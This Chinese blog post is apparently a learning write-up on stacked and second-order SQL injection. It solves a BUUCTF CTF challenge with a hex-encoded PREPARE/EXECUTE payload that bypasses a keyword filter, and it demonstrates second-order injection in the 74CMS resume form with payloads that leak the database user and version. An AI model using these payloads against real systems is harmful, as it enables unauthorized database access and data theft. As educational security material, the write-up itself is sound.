sql注入-堆叠+二次

已于 2023-06-29 19:27:50 修改
阅读量377 收藏
点赞数 1
分类专栏: SQL注入漏洞合集 文章标签: web安全 sql mysql
于 2023-06-28 07:58:15 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/m0_51345235/article/details/131428873
版权

  

堆叠注入

堆叠注入就是将一堆sql语句使用分号叠加在一起执行,使用分号结束上一个语句再继续执行后面的语句。

 

支持堆叠的数据库类型:MYSQL MSSQL Postgresql等

案例:BUUCTF---强网杯2019随便注

首先启动并访问靶机,有一个输入框,随便输入1',发现报错了,说明可能存在sql注入

 

输入:' union select 1,2;  判断字段,结果提示return preg_match("/select|update|delete|drop|insert|where|\./i",$inject);意思是select等关键字都被过滤了

 

 

我们就可以通过堆叠注入的方式,来绕过select等关键字

输入:';show tables; 查数据表

 

输入:';show columns from `1919810931114514`;  查看表字段

 

由于select关键字被过滤了,我们可以将select * from `1919810931114514`语句进行16进制编码

 

 

在定义一个变量并将sql语句初始化,然后调用

输入:

';Set @j =

 0x73656c656374202a2066726f6d20603139313938313039333131313435313460;

PREPARE cs from @j;EXECUTE cs;

成功获取flag。

次注入

案例:

74CMS----个人会员中心

打开网站会员中心,点击创建简历,填写信息,一直到教育经历。

在学校名称处填写:xiaoheizi',address=user()#    点击保存

选择查看我们刚刚创建的简历

可以看到数据库执行了我们设置的语句,报出了数据库用户

再次创建一份简历

完善简历到教育经历处

学校名称填写为:xiaoheizi',address=version()#    点击保存

查看我们刚刚创建的简历

成功获取数据库版本信息

 

 

 

 

 

二次注入产生过程:

在创建简历时候有七个模块,每次填写完一个模块点击保存后——数据库会执行一次insert插入操作,把我们填写的信息插入到每个模块对应的表中。七个模块就是七个表

教育经历模块对应的表

然后数据库还会在执行一个update更新操作,把七个表的数据全部更新到一个总表中,因为我们在教育经历模块填写了(address=version()#,所以在更新的时候总表address字段内容就会被更新为数据库版本号:version()

我们在点击查看简历时——数据库就会执行一个select查询操作,把总表中的内容在页面展示出来,因为address字段代表联系地址,所以版本号才会展示在这里

 

 

 

 

  

xiaoheizi安全
关注
  • 1
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 打赏
    打赏
  • 0
    评论
专栏目录
WEB渗透学习笔记4——堆叠注入二次注入
林林木林林L的博客
07-24 2209
堆叠查询注入攻击 Stackedinjections:堆叠注入。从名词的含义就可以看到应该是一堆sql语句(多条)一起执行。而在真实的运用中也是这样的,我们知道在mysql中,主要是命令行中,每一条语句结尾加 ; 表示语句结束。这样我们就想到了是不是可以多句一起使用。这个叫做 stacked injection 在SQL中,分号(;)是用来表示一条sql语句的结束。试想一下我们在 ; 结束一个sql 语句后继续构造下一条语句,会不会一起执行?因此这个想法也就造就了堆叠注入。而 unioninjection(
攻防世界-Web高手进阶区-supersqli(强网杯的随便注)
feng的博客
09-14 1552
前言 此题可谓是奇技淫巧甚多,之前做过一次,不过当时没有写WP。今天偶然又看到了这个题目,打开环境发现又有些不会,因此又把这题相关的知识点和各种技巧看了一遍,写下这篇WP。 WP 首先进入环境,发现是SQL注入。我们先简单的进行一些测试,发现是字符型注入,因此加一个单引号然后后面加#来闭合,然后测试1=1,1=2,发现都可以,然后进行order by测试,发现是2。但是在进行union注入的时候出现: return preg_match("/select|update|delete|drop|insert|
攻防世界web高手区supersqli解法(详细)
qq_53105813的博客
05-25 1806
supersqli 翻译一下为超级数据库 打开题目很明显,直接想到sql注入 验证一下猜想 提交 1’ and 1=1#和1‘ and 1=2#(输入框中没有显示在url中) 说明存在注入漏洞 接下来用order by判断字段 提交 1'order by 2# 提交 1'order by 3# 说明只有两个字段爆出 接下来尝试爆数据库名 提交: 1'union select 1,database()# 返回错误信息 return preg_mat...
sql注入-堆叠注入】多语句执行、结合其他注入
07-12 4627
堆叠注入】相比其他注入能执行的操作更多
sql注入知识---堆叠注入
尘玥的故事
04-11 1244
堆叠注入的使用条件十分有限,其可能受到API或者数据库引擎,又或者权限的限制只有当调用数据库函数支持执行多条sql语句时才能够使用,利用mysqli_multi_query()函数就支持多条sql语句同时执行,但实际情况中,如PHP为了防止sql注入机制,往往使用调用数据库的函数是mysqli_ query()函数,其只能执行一条语句,分号后面的内容将不会被执行,所以可以说堆叠注入的使用条件十分有限,一旦能够被使用,将可能对网站造成十分大的威胁。根据数据库类型决定是否支持多条语句执行(核心)
sql注入堆叠注入
weixin_42566218的博客
02-19 8605
一、堆叠注入的原理 mysql数据库sql语句的默认结束符是以";"号结尾,在执行多条sql语句时就要使用结束符隔 开,而堆叠注入其实就是通过结束符来执行多条sql语句 比如我们在mysql的命令行界面执行一条查询语句,这时语句的结尾必须加上分号结束 select * from student; 如果我们想要执行多条sql那就用结束符分号进行隔开,比如在查询的同时查看当前登录用户是谁 select * from student;select current_user();
web-其他注入二次注入
07-15
堆叠注入是指在同一个请求中执行多个SQL语句,这可能通过分号(`;`)或其他分隔符实现。在这个案例中,攻击者首先通过以下语句判断数据类型、列数: ```sql ?id=1' AND 1=2 ORDER BY 3-- ``` 然后,他们使用堆叠注入...
SQL-Injection-cheat-sheet:利用和学习SQL注入的备忘单
02-06
- **二次查询**:利用已存储的结果(如session)作为新查询的一部分。 3. **常见注入技巧**: - **字符转义**:使用反斜杠(\)对特殊字符进行转义。 - **注释注入**:利用SQL注释符号(-- 或 /* */)来终止正常查询...
SQL_Injection_Payload:SQL注入有效负载列表
01-28
8. **堆叠查询**:在单个请求中执行多个查询,使得攻击者可以在一次注入中完成更复杂的操作。 9. **信息收集**:攻击者通常首先尝试获取数据库版本、用户列表、表名和列名等信息,以确定进一步的攻击策略。 10. **...
一次sql注入问题的筛查报告 ,主要 是sql 注入的问题
最新发布
05-10
2. SQL注入类型:包括基于错误的注入、基于时间的盲注、联合查询注入堆叠查询注入等。每种类型的注入方式都有其独特的利用技巧。 二、SQL注入的危害 1. 数据泄露:攻击者可以读取、修改或删除数据库中的数据,...
SQL数据库的高级sql注入的一些知识
09-11
- **二次查询**:利用已存储的查询结果作为新查询的一部分。 3. **针对Ms IIS/ASP/SQL-Server平台的攻击** 在ASP环境中,通常使用ADO对象来连接和操作SQL Server数据库。攻击者可以通过篡改URL参数或表单输入,...
SQL注入之路之五:堆叠注入
weixin_62715196的博客
08-12 240
初略的讲述一下堆叠注入的原理,记录一下自己的学习过程,但还有很多需要逐步去完善
SQL注入- 堆叠注入
m0_52149675的博客
04-05 3050
​stacked injections(堆叠注入)从名词的含义就可以看到应该是一堆sql语句(多条)一起执行。而在真实的运用中也是这样的,我们知道在mysql 中,主要是命令行中,每一条语句结尾加;表示语句结束。这样我们就想到了是不是可以多句一起使用。这个叫做stacked injection。
SQL注入原理-堆叠注入
zl5186888的博客
09-21 608
mysqli_query()只能执行一条SQL语句,如果这需要执行多条SQL语句,就需要使用mysqli_multi_query()方法,mysqli_multi_query()可以执行多条SQL语句,如果后端代码使用这个方法去执行SQL语句,我们就可以利用堆叠注入获取后台数据库的信息。这样我们就得到了当前数据库长度,接下来可以爆出数据库的库名以及接下来的获取数据的各种操作,具体的时间盲注操作可以参考我之前的文章——SQL注入原理之时间盲注,原理都一样,小伙伴理解之后套用就行了。
BUUCTF - [SUCTF 2019]EasySQL(堆叠注入
FY_13_14的博客
01-05 389
1.启动靶机之后如同所示 2.输入1有回显,输入字母无回显 1.查找所有数据库如图 2.查询数据库表名,发现flag 3.直接查找flag 发现找不到 然后尝试后发现可以直接用*,1查出flag 它的意思就是select *,1 from Flag,选择全部的数据库,多加一列,把flag显示出来,这样就直接查询出了Flag表中的所有内容。 ...
BUUCTF的web方向题目(一)
wanan的博客
10-06 386
BUUCTF的web方向题目(一)
网安之web攻防第三十天
B_l_a_nk的博客
03-31 269
1、数据库堆叠注入 根据数据库类型决定是否支持多条语句执行 2、数据库二次注入 应用功能逻辑涉及上导致的先写入后组合的注入 3、数据库Dnslog注入 解决不回显(反向连接),SQL注入,命令执行,SSRF等 4、黑盒模式分析以上 二次注入:插入后调用显示操作符合 堆叠注入:判断注入后直接调多条执行 DNS注入:在注入上没太大利用价值,其他还行
sql注入学习分享
这个时代,作为程序员可能要学习小程序
09-25 363
点击上方关注 “终端研发部”设为“星标”,和你一起掌握更多数据库知识WEB框架web应用一改我们平时常见的 p2p 和 C/S 模式,采用 B/S 模式。随着网络技术的发展,特别随着Web技术的不断成熟,B/S 这种软件体系结构出现了。浏览器-服务器(Browser/Server)结构,简称 B/S 结构,与 C/S不同,其客户端不需要安装专门的软件,只需要浏览器即可,浏览器与Web服务器交互,W...
SQL注入——堆叠注入
nobugnomoney的博客
05-19 3181
一、堆叠注入的原理 1、介绍 在 SQL 中,分号(;)是用来表示一条 sql 语句的结束。试想一下我们在 ; 结束一个 sql 语句后继续构造下一条语句,会不会一起执行?因此这个想法也就造就了堆叠注入。而 union injection(联合注入)也是将两条语句合并在一起,两者之间有什么区别么?区别就在于 union 或者 union all 执行的语句类型是有限的,可以用来执行查询语句,而堆叠注入可以执行的是 任意的语句。 例如下面这个例子: 用户输入: 1; DELETE FROM products
sql注入中-- - 和-- + 和#的区别
06-02
SQL 注入中,"--"、"-- "、"--+"、"#"等符号是常用的注释符号,用于在 SQL 语句中注释掉后面的内容,以达到绕过身份验证、绕过 SQL 语句限制、获取敏感信息等目的。它们的区别如下: 1. "--":表示注释掉后面的...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

xiaoheizi安全

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值